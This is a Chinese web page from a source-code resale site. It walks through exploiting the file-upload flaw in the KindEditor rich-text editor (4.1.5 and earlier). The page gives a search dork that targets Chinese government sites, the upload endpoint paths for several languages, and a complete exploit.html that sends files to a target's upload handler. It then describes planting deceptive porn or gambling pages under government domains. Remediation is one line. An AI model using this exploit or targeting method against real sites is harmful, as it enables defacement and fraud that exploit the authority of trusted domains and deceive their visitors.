最新公告
  • 欢迎您光临源码库,本站秉承服务宗旨 履行“站长”责任,销售只是起点 服务永无止境!立即加入
  • 网站渗透富文本编辑器 kindeditor4.1.5 文件上传漏洞_蜘蛛技巧_超级蜘-蛛-池

    网站渗透富文本编辑器 kindeditor4.1.5 文件上传漏洞_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    漏洞等级:高危

    Kindeditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。

    网站渗透富文本编辑器 kindeditor4.1.5 文件上传漏洞_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    漏洞描述:

    Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件。支持

    Java、.NET、PHP、ASP等程序。

    漏洞利用:

    通过搜索引擎找到目标,比如:搜索关键字 inurl:gov.cn/kindeditor

    通过访问http://www.xx.gov.cn/kindeditor/kindeditor.js,查看kindeditor版本是否含有漏洞(<=4.1.5)

    获得网站使用的开发语言,并确定kindeditor上传文件地址,各种语言上传地址如下:

    • /asp/upload_json.asp

    • /asp.net/upload_json.ashx

    • /jsp/upload_json.jsp

    • /php/upload_json.php

    创建exploit.html页面,编辑内容如下:

    <html>
    <head>
    <title>kindeditor exploit</title>
    <script src="http://www.xx.gov.cn/kindeditor/kindeditor.js"></script>
    <script>
    KindEditor.ready(function(K) {
    	var uploadbutton = K.uploadbutton({
    		button : K('#uploadButton')[0],
    		fieldName : 'imgFile',
    		url : 'http://www.xx.gov.cn/kindeditor/asp.net/upload_json.ashx?dir=file',
    		afterUpload : function(data) {
    			if (data.error === 0) {
    				var url = K.formatUrl(data.url, 'absolute');
    				K('#url').val(url);
    			}
    		},
    	});
    	uploadbutton.fileBox.change(function(e) {
    		uploadbutton.submit();
    	});
    });
    </script>
    </head>
    <body>
    <div class="upload">
    	<input type="button" id="uploadButton" value="Upload" />
    </div>
    </body>
    </html>

    浏览器访问页面效果如下:

    网站渗透富文本编辑器 kindeditor4.1.5 文件上传漏洞_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    选择文件test.txt文件(文件内容:test…2019/03/04),网站审核元素,查看返回结果,如图:

    网站渗透富文本编辑器 kindeditor4.1.5 文件上传漏洞_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    访问网址结果如下:

    网站渗透富文本编辑器 kindeditor4.1.5 文件上传漏洞_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    漏洞影响:

    由于该漏洞无法上传php,asp,java等类型文件,所以无法getshell,但是可以上传包含色情、赌博等类欺骗性html网页,如果上传到政府类网站,不法分子会利用政府域名的权威性达到欺骗普通用户的目的,所以危害性很大。

    解决办法:

     限制上传文件类型

    1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
    2. 分享目的仅供大家学习和交流,您必须在下载后24小时内删除!
    3. 不得使用于非法商业用途,不得违反国家法律。否则后果自负!
    4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
    5. 如有链接无法下载、失效或广告,请联系管理员处理!
    6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!

    源码资源库 » 网站渗透富文本编辑器 kindeditor4.1.5 文件上传漏洞_蜘蛛技巧_超级蜘-蛛-池